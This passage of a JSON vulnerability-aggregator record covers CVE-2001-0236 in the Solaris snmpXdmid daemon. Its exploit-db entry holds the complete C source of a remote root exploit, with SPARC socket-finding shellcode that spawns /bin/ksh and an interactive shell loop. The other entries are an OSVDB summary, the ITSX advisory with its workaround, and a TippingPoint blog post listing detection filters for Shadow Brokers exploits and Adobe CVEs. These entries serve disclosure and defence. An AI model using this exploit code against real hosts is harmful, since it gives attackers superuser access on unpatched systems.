"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T14:43:16", "osvdbidlist": ["546"], "references": [], "edition": 1, "description": "Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability. CVE-2001-0236. Remote exploit for solaris platform", "reporter": "Last Stage of Delirium", "published": "2001-03-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0236"], "modified": "2001-03-15T00:00:00", "id": "EDB-ID:20648", "href": "https://www.exploit-db.com/exploits/20648/", "sourceData": "source: http://www.securityfocus.com/bid/2417/info\r\n\r\nVersions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa.\r\n\r\nSnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap.\r\n\r\nSnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately. \r\n\r\n/*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/\r\n/*## snmpXdmid #*/\r\n\r\n/* as the final jump to the assembly code is made to the heap area, this code */ \r\n/* also works against machines with non-exec stack protection turned on */ \r\n/* due to large data transfers of about 128KB, the code may need some time to */\r\n/* proceed, so be patient */\r\n\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <rpc/rpc.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <errno.h>\r\n\r\n#define SNMPXDMID_PROG 100249\r\n#define SNMPXDMID_VERS 0x1\r\n#define SNMPXDMID_ADDCOMPONENT 0x101\r\n\r\nchar findsckcode[]=\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <findsckcode+4> */\r\n \"\\x33\\x02\\x12\\x34\"\r\n \"\\xa0\\x10\\x20\\xff\" /* mov 0xff,%l0 */\r\n \"\\xa2\\x10\\x20\\x54\" /* mov 0x54,%l1 */\r\n \"\\xa4\\x03\\xff\\xd0\" /* add %o7,-48,%l2 */\r\n \"\\xaa\\x03\\xe0\\x28\" /* add %o7,40,%l5 */\r\n \"\\x81\\xc5\\x60\\x08\" /* jmp %l5+8 */\r\n \"\\xc0\\x2b\\xe0\\x04\" /* stb %g0,[%o7+4] */\r\n \"\\xe6\\x03\\xff\\xd0\" /* ld [%o7-48],%l3 */\r\n \"\\xe8\\x03\\xe0\\x04\" /* ld [%o7+4],%l4 */\r\n \"\\xa8\\xa4\\xc0\\x14\" /* subcc %l3,%l4,%l4 */\r\n \"\\x02\\xbf\\xff\\xfb\" /* bz <findsckcode+32> */\r\n \"\\xaa\\x03\\xe0\\x5c\" /* add %o7,92,%l5 */\r\n \"\\xe2\\x23\\xff\\xc4\" /* st %l1,[%o7-60] */\r\n \"\\xe2\\x23\\xff\\xc8\" /* st %l1,[%o7-56] */\r\n \"\\xe4\\x23\\xff\\xcc\" /* st %l2,[%o7-52] */\r\n \"\\x90\\x04\\x20\\x01\" /* add %l0,1,%o0 */\r\n \"\\xa7\\x2c\\x60\\x08\" /* sll %l1,8,%l3 */\r\n \"\\x92\\x14\\xe0\\x91\" /* or %l3,0x91,%o1 */\r\n \"\\x94\\x03\\xff\\xc4\" /* add %o7,-60,%o2 */\r\n \"\\x82\\x10\\x20\\x36\" /* mov 0x36,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"\\x1a\\xbf\\xff\\xf1\" /* bcc <findsckcode+36> */\r\n \"\\xa0\\xa4\\x20\\x01\" /* deccc %l0 */\r\n \"\\x12\\xbf\\xff\\xf5\" /* bne <findsckcode+60> */\r\n \"\\xa6\\x10\\x20\\x03\" /* mov 0x03,%l3 */\r\n \"\\x90\\x04\\x20\\x02\" /* add %l0,2,%o0 */\r\n \"\\x92\\x10\\x20\\x09\" /* mov 0x09,%o1 */\r\n \"\\x94\\x04\\xff\\xff\" /* add %l3,-1,%o2 */\r\n \"\\x82\\x10\\x20\\x3e\" /* mov 0x3e,%g1 */\r\n \"\\xa6\\x84\\xff\\xff\" /* addcc %l3,-1,%l3 */\r\n \"\\x12\\xbf\\xff\\xfb\" /* bne <findsckcode+112> */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n;\r\n\r\nchar shellcode[]=\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4> */\r\n \"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n \"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n \"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n \"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n \"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n \"\\x82\\x10\\x20\\x0b\" /* mov 0x0b,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"/bin/ksh\"\r\n;\r\n\r\nstatic char nop[]=\"\\x80\\x1c\\x40\\x11\";\r\n\r\ntypedef struct{\r\n struct{unsigned int len;char *val;}name;\r\n struct{unsigned int len;char *val;}pragma;\r\n}req_t;\r\n\r\nbool_t xdr_req(XDR *xdrs,req_t *objp){\r\n char *v=NULL;unsigned long l=0;int b=1;\r\n if(!xdr_u_long(xdrs,&l)) return(FALSE);\r\n if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\n if(!xdr_bool(xdrs,&b)) return(FALSE);\r\n if(!xdr_u_long(xdrs,&l)) return(FALSE);\r\n if(!xdr_bool(xdrs,&b)) return(FALSE);\r\n if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),\r\n (xdrproc_t)xdr_char)) return(FALSE);\r\n if(!xdr_bool(xdrs,&b)) return(FALSE);\r\n if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),\r\n (xdrproc_t)xdr_char)) return(FALSE);\r\n if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\n if(!xdr_u_long(xdrs,&l)) return(FALSE);\r\n return(TRUE);\r\n}\r\n\r\nmain(int argc,char **argv){\r\n char buffer[140000],address[4],pch[4],*b;\r\n int i,c,n,vers=-1,port=0,sck;\r\n CLIENT *cl;enum clnt_stat stat;\r\n struct hostent *hp;\r\n struct sockaddr_in adr;\r\n struct timeval tm={10,0};\r\n req_t req;\r\n\r\n printf(\"copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\\n\");\r\n printf(\"snmpXdmid for solaris 2.7 2.8 sparc\\n\\n\");\r\n\r\n if(argc<2){\r\n printf(\"usage: %s address [-p port] -v 7|8\\n\",argv[0]);\r\n exit(-1);\r\n }\r\n\r\n while((c=getopt(argc-1,&argv[1],\"p:v:\"))!=-1){\r\n switch(c){\r\n case 'p': port=atoi(optarg);break;\r\n case 'v': vers=atoi(optarg);\r\n }\r\n }\r\n switch(vers){\r\n case 7: *(unsigned int*)address=0x000b1868;break;\r\n case 8: *(unsigned int*)address=0x000cf2c0;break;\r\n default: exit(-1);\r\n }\r\n\r\n *(unsigned long*)pch=htonl(*(unsigned int*)address+32000);\r\n *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);\r\n\r\n printf(\"adr=0x%08x timeout=%d \",ntohl(*(unsigned long*)address),tm.tv_sec);\r\n fflush(stdout);\r\n\r\n adr.sin_family=AF_INET;\r\n adr.sin_port=htons(port);\r\n if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\n if((hp=gethostbyname(argv[1]))==NULL){\r\n errno=EADDRNOTAVAIL;perror(\"error\");exit(-1);\r\n }\r\n memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);\r\n }\r\n\r\n sck=RPC_ANYSOCK;\r\n if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){\r\n clnt_pcreateerror(\"error\");exit(-1);\r\n }\r\n cl->cl_auth=authunix_create(\"localhost\",0,0,0,NULL);\r\n\r\n i=sizeof(struct sockaddr_in);\r\n if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){\r\n struct{unsigned int maxlen;unsigned int len;char *buf;}nb;\r\n ioctl(sck,(('S'<<8)|2),\"sockmod\");\r\n nb.maxlen=0xffff;\r\n nb.len=sizeof(struct sockaddr_in);;\r\n nb.buf=(char*)&adr;\r\n ioctl(sck,(('T'<<8)|144),&nb);\r\n }\r\n n=ntohs(adr.sin_port);\r\n printf(\"port=%d connected! \",n);fflush(stdout);\r\n\r\n findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);\r\n findsckcode[12+3]=(unsigned char)(n&0xff);\r\n\r\n b=&buffer[0];\r\n for(i=0;i<1248;i++) *b++=pch[i%4];\r\n for(i=0;i<352;i++) *b++=address[i%4];\r\n *b=0;\r\n\r\n b=&buffer[10000];\r\n for(i=0;i<64000;i++) *b++=0;\r\n for(i=0;i<64000-188;i++) *b++=nop[i%4];\r\n for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];\r\n for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];\r\n *b=0;\r\n\r\n req.name.len=1200+400+4;\r\n req.name.val=&buffer[0];\r\n req.pragma.len=128000+4;\r\n req.pragma.val=&buffer[10000];\r\n\r\n stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);\r\n if(stat==RPC_SUCCESS) {printf(\"\\nerror: not vulnerable\\n\");exit(-1);}\r\n printf(\"sent!\\n\");\r\n\r\n write(sck,\"/bin/uname -a\\n\",14);\r\n while(1){\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sck,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){\r\n int cnt;\r\n char buf[1024];\r\n if(FD_ISSET(0,&fds)){\r\n if((cnt=read(0,buf,1024))<1){\r\n if(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\n else break;\r\n }\r\n write(sck,buf,cnt);\r\n }\r\n if(FD_ISSET(sck,&fds)){\r\n if((cnt=read(sck,buf,1024))<1){\r\n if(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\n else break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n }\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20648/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in the snmpXdmid RPC service on Solaris. The snmpXdmid service fails to check the length of an incoming buffer resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code and obtain root access.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in the snmpXdmid RPC service on Solaris. The snmpXdmid service fails to check the length of an incoming buffer resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code and obtain root access.\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-22-00207-1)\nSnort Signature ID: 569\nSnort Signature ID: 593\nSnort Signature ID: 1279\n[Nessus Plugin ID:10659](https://vulners.com/search?query=pluginID:10659)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-03/0175.html\nISS X-Force ID: 6245\n[CVE-2001-0236](https://vulners.com/cve/CVE-2001-0236)\nCIAC Advisory: l-065\nCERT VU: 648304\nCERT: CA-2001-05\nBugtraq ID: 2417\n", "reporter": "Job de Haas(job@itsx.com)", "published": "2001-03-14T00:00:00", "title": "Solaris snmpXdmid Long Indication Event Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [{"name": "Solaris", "version": "8", "operator": "eq"}, {"name": "Solaris", "version": "7", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2001-0236"], "modified": "2001-03-14T00:00:00", "id": "OSVDB:546", "href": "https://vulners.com/osvdb/OSVDB:546", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:04", "references": [], "description": "Summary\r\n-------\r\n\r\n Title: Solaris SNMP to DMI mapper daemon vulnerability\r\n Date Published: 2001-03-15\r\n Bugtraq ID: 2417\r\n CVE CAN: CAN-2001-0236\r\n Class: Boundary Error Condition &#40;Buffer Overflow&#41;\r\n Remotely Exploitable: Yes\r\n Locally Exploitable: Yes\r\n\r\nDescription\r\n-----------\r\n\r\n SNMP and DMI are remote management protocols. The snmpXdmid mapper daemon\r\n is used on Solaris to combine both worlds. This daemon has an\r\n overflow in a buffer for handling an &#39;indication&#39;. This &#39;indication&#39;\r\n is sent to the daemon over RPC service 1000249.\r\n\r\nImpact\r\n------\r\n\r\n The buffer overflow can lead to local and remote root compromise.\r\n\r\nWorkaround\r\n----------\r\n\r\n For 99&#37; of the cases the daemon can be safely turned off by turning off DMI\r\n completely. This can be achieved by renaming /etc/rc?.d/S??dmi to\r\n /etc/rc?.d/K07dmi and calling &#39;/etc/init.d/init.dmi stop&#39;\r\n &#40;where ? is the appropriate runlevel&#41;. It is also wise to remove all\r\n permissions from the binary: chmod 000 /usr/lib/dmi/snmpXdmid\r\n\r\n The deamon will generally listen on a high port both on TCP and UDP.\r\n\r\nAffected systems\r\n----------------\r\n\r\n An exploit has been tested on Solaris 8 sun4u. However it seems likely\r\n that every previous version is vulnerable including any security\r\n patches previously created.\r\n\r\n The daemon was bundled with Solaris 2.6, 7 and 8\r\n\r\nVendor notification\r\n-------------------\r\n\r\n Sun Microsystems was notified on February 7, 2001. Patches are expected\r\n shortly, but no information is available on an actual patch date.\r\n\r\nBackground\r\n----------\r\n\r\n The Desktop Management Interface &#40;DMI&#41; is a management protocol designed\r\n by the Desktop Management Task Force &#40;DMTF&#41;. More information can be found\r\n at http://www.dmtf.org.\r\n\r\n Sun Microsystems has been providing a daemon based on these specifications\r\n called &#39;dmid&#39; since Solaris 2.6. Further, Sun created a coupling between\r\n SNMP and DMI in the form of a so-called mapper daemon:\r\n\r\n /usr/lib/dmi/snmpXdmid\r\n\r\n This daemon registers itself with both &#39;snmpdx&#39; and &#39;dmid&#39; and translates\r\n SNMP requests to DMI.\r\n\r\n The mapper daemon shows itself to the world in two ways. On one hand it\r\n registers itself with &#39;snmpdx&#39; as a subagent using a protocol called DPI.\r\n It uses the UDP port 6500 for this. On the other hand it registers itself\r\n with &#39;dmid&#39; using the RPC based protocol of DMI. This is found on Solaris\r\n as RPC service 1000249:\r\n\r\n ~&gt; rpcinfo -p\r\n ...\r\n 100249 1 udp 32785\r\n 100249 1 tcp 32786\r\n ..\r\n\r\n This service is a callback service that allows &#39;dmid&#39; to report events\r\n back to &#39;snmpXdmid&#39;. These events are called &#39;indications&#39; and are\r\n translated into SNMP traps. By using one such event, an overflow is\r\n triggered.\r\n\r\n More information about the XDR formats used to talk to the &#39;dmid&#39; daemon\r\n can be found in the SDK available from Sun &#40;ref. 1&#41;:\r\n\r\n /usr/include/dmi/common.h\r\n /usr/include/dmi/server.h\r\n /usr/include/dmi/ci_callback.h\r\n\r\n Further the callback specification for reporting back indications can be\r\n found in:\r\n\r\n /opt/SUNWconn/sea/dmi/sample/miexample.h\r\n\r\n In this case the overflow can be triggered by the event DmiComponentAdded\r\n with all fields empty except for the name of the component the indication\r\n is about. This results in a simple overflow in a memcpy in the daemon:\r\n\r\n =&gt;[1] __align_cpy_1&#40;0xfea0b590, 0xe15b4, 0x...\r\n [2] generateTrap&#40;0xe0ae8, 0x0, 0x25438, 0x...\r\n [3] handle_CompLangGrpIndication&#40;0x48400, 0xfea0bb70, 0x47b30,...\r\n [4] _dmicomponentadded_0x1_svc&#40;0xfea0bb70, 0x49bb0, 0x...\r\n [5] dmi2_client_0x1&#40;0x44a24, 0x24f58, 0x4443c, 0x...\r\n [6] _svc_prog_dispatch&#40;0x2509c, 0x1, 0x0, 0xff21a...\r\n [7] svc_getreq_common&#40;0xff21ebf0, 0x1, 0xff228778, 0x...\r\n [8] svc_getreq_poll&#40;0x1, 0xb49d8, 0xff21ae30, 0x...\r\n [9] waitForIndication&#40;0x48378, 0x1, 0x...\r\n\r\n From the trace above it can be seen that the indication received from\r\n &#39;dmid&#39; is translated into an SNMP trap. It is there that the overflow\r\n occurs.\r\n\r\n From the way the daemon works it looks like it would be sufficient if\r\n it listened solely on the loopback interface or used another form of\r\n local transport to communicate. This would make remote attacks on the\r\n daemon much more difficult. Also important, because it is unknown if\r\n the daemon provides any authentication at all on messages received on\r\n both the SNMP interface as the DMI interface.\r\n\r\nCredit\r\n------\r\n\r\n This vulnerability was discovered by Job de Haas &#40;job@itsx.com&#41; of ITSX BV\r\n Amsterdam, The Netherlands &#40;http://www.itsx.com&#41;.\r\n\r\n\r\nReferences\r\n----------\r\n\r\n[1] Solstice Enterprise Agents SDK\r\n http://www.sun.com/software/entagents/download/\r\n\r\n[2] Solstice Enterprise Agents User Guide 1.0\r\n Chapter 6. Using SNMP With DMI\r\n http://www.sun.com/software/entagents/docs/UGhtml/snmp_with_dmi.doc.html\r\n\r\n[3] DMI v2.0s Specification\r\n http://www.dmtf.org/spec/spec.html\r\n\r\n[4] DMI-to-SNMP Mapping Specification\r\n http://www.dmtf.org/spec/snmp.html\r\n\r\n\r\nCopyright notice\r\n----------------\r\n\r\n The contents of this advisory are copyright &#40;c&#41; 2001 ITSX BV. and may\r\n be distributed freely provided that no fee is charged for this\r\n distribution and the author&#40;s&#41; are given credit.\r\n\r\n All the product names mentioned herein are trademarks of their respective\r\n owners.", "edition": 1, "reporter": "Securityvulns", "published": "2001-03-15T00:00:00", "title": "Solaris /usr/lib/dmi/snmpXdmid vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:04", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2001-0236"], "modified": "2001-03-15T00:00:00", "id": "SECURITYVULNS:DOC:1394", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1394", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-05-01T13:42:31", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "description": "\n\nI\u2019ve never been one to adopt the latest fashion trends, aside from what I wore growing up in the 1980s. I wore shoulder pads, blue eyeliner, designer jeans, and even parachute pants. While I continue to rock my 80s hair to this day, other trends I thought were long gone are making a comeback. (Shoulder pads \u2013 seriously?) History tends to repeat itself \u2013 what\u2019s old is new again \u2013 and it\u2019s no different in the security world.\n\n \n\nLast weekend, a group known as \u201cShadow Brokers\u201d released a large set of tools that can exploit flaws in several versions of Microsoft products and other platforms. A number of the exploits have CVEs that date as far back as 2001. In fact, one of the exploits named \u201cEwokFrenzy\u201d was discovered through our Zero Day Initiative over 10 years ago. Customers with TippingPoint solutions have had coverage for EwokFrenzy through Digital Vaccine\u00ae (DV) filter 4033 since **January 2006!**\n\nOur TippingPoint DVLabs team continues to review the contents associated with the Shadow Brokers disclosure to recommend coverage for TippingPoint solutions. The following table includes the DV filters that provide protection, including new filters released in an out-of-band release this week:\n\n** Exploit Name** | ** MS Bulletin** | ** CVE/ZDI** | ** Filters** | ** 0day?** | ** Status** \n---|---|---|---|---|--- \nDoublePulsar \n(Payload) | | | *27935 | N/A | Policy Filter \nEarlyShovel | | | *27938 | Unknown | Detects Exploit \nEasyBee** | | CVE-2007-1675 \nZDI-07-011 | | No | Investigating \nEasyPi | | | | Unknown | Investigating \nEbbisLand | | CVE-2001-0236 | 621, 622, 3512, 3791 | No | Investigating \nEchoWrecker | | CVE-2003-0201 | 1676 | No | Investigating \nEclipsedWing | MS08-067 | CVE-2008-4250 | 6515 | No | Detects Exploit \nEducatedScholar | MS09-050 | | 8465 | No | Detects Exploit \nELV | MS06-040 | CVE-2006-3439 | 9317 | No | Detects Exploit \nEmeraldThread | MS10-061 | | 10458, *27939 | No | Detects Exploit \nEmphasisMine | | | | Unknown | Investigating \nEnglishManDentist | | | | Unknown | Investigating \nErraticGopher | | | *27932 | Yes | Detects Exploit \nESKE | | CVE-2003-0352 | | No | Investigating \nEskimoRoll | MS14-068 | CVE-2014-6324 | *27940 | No | Exploit Unfilterable \nPolicy Filter \nEsteemAudit | | | *27933 | Yes | Detects Exploit \nEternalBlue | MS17-010 | | 27433, 27711, *27928 | No | Detects Exploit \nEternalChampion | MS17-010 | CVE-2017-0146 | 27433, 27711, *27929 | No | Detects Exploit \nEternalRomance | MS17-010 | | | No | Investigating \nEternalSynergy | MS17-010 | CVE-2017-0714 | *27937 | No | Detects Exploit \nEtre | | | | No | Investigating \nEVFR | | CVE-2003-0109 | 1612 | No | Detects Exploit \nEwokFrenzy | | CVE-2007-1675 \nZDI-07-011 | 4033 | No | Detects Exploit \nExplodingCan | | CVE-2017-7269 | 27643 | No | Detects Exploit \n* New DV filter \n**Identical to EwokFrenzy, but exploit untested against filter \n \n \n\n[Click here](<https://success.trendmicro.com/solution/1117192>) for more information on Trend Micro\u2019s response and recommendations for coverage across all Trend Micro products.\n\n**Adobe Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe Security Bulletins released on or before April 6, 2017.The following table maps Digital Vaccine filters to the Adobe updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s Adobe security updates from Dustin Childs\u2019 [April 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/4/11/the-april-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB17-10 | CVE-2017-3058 | 27698 | \nAPSB17-10 | CVE-2017-3059 | *27697 | \nAPSB17-10 | CVE-2017-3060 | 27832 | \nAPSB17-10 | CVE-2017-3061 | 27833 | \nAPSB17-10 | CVE-2017-3062 | *27533 | \nAPSB17-10 | CVE-2017-3063 | *27534 | \nAPSB17-10 | CVE-2017-3064 | 27836 | \nAPSB17-11 | CVE-2017-3013 | 27923, 27925 | \nAPSB17-11 | CVE-2017-3014 | 27824 | \nAPSB17-11 | CVE-2017-3017 | 27827 | \nAPSB17-11 | CVE-2017-3019 | *26521 | \nAPSB17-11 | CVE-2017-3020 | *26491 | \nAPSB17-11 | CVE-2017-3021 | *26510 | \nAPSB17-11 | CVE-2017-3022 | *26631 | \nAPSB17-11 | CVE-2017-3023 | *26535 | \nAPSB17-11 | CVE-2017-3024 | 27829 | \nAPSB17-11 | CVE-2017-3025 | 27851 | \nAPSB17-11 | CVE-2017-3026 | 27852 | \nAPSB17-11 | CVE-2017-3027 | 27909 | \nAPSB17-11 | CVE-2017-3028 | *27160 | \nAPSB17-11 | CVE-2017-3029 | *27159 | \nAPSB17-11 | CVE-2017-3030 | 27823 | \nAPSB17-11 | CVE-2017-3031 | *27241, *27260 | \nAPSB17-11 | CVE-2017-3032 | *27158 | \nAPSB17-11 | CVE-2017-3033 | *27261 | \nAPSB17-11 | CVE-2017-3034 | *27225 | \nAPSB17-11 | CVE-2017-3035 | *27236 | \nAPSB17-11 | CVE-2017-3036 | *27304 | \nAPSB17-11 | CVE-2017-3037 | 27849 | \nAPSB17-11 | CVE-2017-3038 | 27908 | \nAPSB17-11 | CVE-2017-3039 | 27905 | \nAPSB17-11 | CVE-2017-3041 | 27903 | \nAPSB17-11 | CVE-2017-3043 | N/A | Local Vulnerability \nAPSB17-11 | CVE-2017-3042 | *27554, *27556, *27557, *27811 | \nAPSB17-11 | CVE-2017-3044 | 27914 | \nAPSB17-11 | CVE-2017-3045 | 27915 | \nAPSB17-11 | CVE-2017-3046 | 27916 | \nAPSB17-11 | CVE-2017-3047 | 27919 | \nAPSB17-11 | CVE-2017-3048 | *27750 | \nAPSB17-11 | CVE-2017-3049 | 27922 | \nAPSB17-11 | CVE-2017-3050 | *27808 | \nAPSB17-11 | CVE-2017-3051 | *27749 | \nAPSB17-11 | CVE-2017-3052 | *27748 | \nAPSB17-11 | CVE-2017-3053 | *27704 | \nAPSB17-11 | CVE-2017-3054 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3055 | *27522 | \nAPSB17-11 | CVE-2017-3056 | *27520 | \nAPSB17-11 | CVE-2017-3057 | *27521 | \nAPSB17-11 | CVE-2017-3011 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3012 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3015 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3018 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3039 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3040 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3065 | N/A | Insufficient Information \n \n \n\n**Zero-Day Filters**\n\nThere are 13 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (10)_**\n\n| \n\n * 27812: ZDI-CAN-4572: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27820: ZDI-CAN-4571: Zero Day Initiative Vulnerability (Adobe Acrobat Reader DC)\n * 27821: ZDI-CAN-4570: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27822: ZDI-CAN-4569: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27832: HTTP: Adobe Flash length Memory Corruption Vulnerability (ZDI-17-247, ZDI-17-248)\n * 27914: HTTP: Adobe Acrobat Pro DC JPEG2000 Buffer Overflow Vulnerability (ZDI-17-267)\n * 27915: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-268)\n * 27916: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-270)\n * 27919: HTTP: Adobe Acrobat Pro DC Annotations Use-After-Free Vulnerability (ZDI-17-271)\n * 27922: HTTP: Adobe Acrobat Pro DC ImageConversion Buffer Overflow Vulnerability (ZDI-17-273)**_ _** \n---|--- \n| \n \n**_Cisco (1)_**\n\n| \n\n * 27807: ZDI-CAN-4635: Zero Day Initiative Vulnerability (Cisco License Manager Server) \n---|--- \n| \n \n**_MIcrosoft (1)_**\n\n| \n\n * 27810: ZDI-CAN-4573: Zero Day Initiative Vulnerability (Microsoft Internet Explorer)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 27804: ZDI-CAN-4638-4639: Zero Day Initiative Vulnerability (Trend Micro Control Manager)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-10-2017/>).", "reporter": "Elisa Lippincott (TippingPoint Global Product Marketing)", "published": "2017-04-21T18:23:45", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of April 17, 2017", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "trendmicroblog", "bulletinFamily": "blog", "cvelist": ["CVE-2017-3013", "CVE-2017-3061", "CVE-2017-3030", "CVE-2017-3036", "CVE-2017-3046", "CVE-2017-7269", "CVE-2003-0109", "CVE-2017-3032", "CVE-2017-3063", "CVE-2008-4250", "CVE-2017-3011", "CVE-2014-6324", "CVE-2017-3037", "CVE-2006-3439", "CVE-2017-3033", "CVE-2017-3054", "CVE-2017-3065", "CVE-2017-3034", "CVE-2017-3041", "CVE-2003-0201", "CVE-4638-4639", "CVE-2017-3051", "CVE-2017-3053", "CVE-2017-3052", "CVE-2017-3023", "CVE-2017-3057", "CVE-2017-3058", "CVE-2017-3049", "CVE-2017-3026", "CVE-2017-3022", "CVE-2017-3012", "CVE-2017-3038", "CVE-2017-3040", "CVE-2017-3029", "CVE-2017-3056", "CVE-2017-3019", "CVE-2017-3042", "CVE-2017-3060", "CVE-2017-3020", "CVE-2017-3031", "CVE-2017-3048", "CVE-2017-3059", "CVE-2017-3047", "CVE-2017-3021", "CVE-2017-3014", "CVE-2017-3044", "CVE-2017-3035", "CVE-2017-3027", "CVE-2017-3017", "CVE-2017-3024", "CVE-2017-3050", "CVE-2017-3025", "CVE-2017-3015", "CVE-2017-3062", "CVE-2007-1675", "CVE-2017-3043", "CVE-2003-0352", "CVE-2017-3064", "CVE-2017-3045", "CVE-2017-3055", "CVE-2017-3039", "CVE-2017-0146", "CVE-2017-3028", 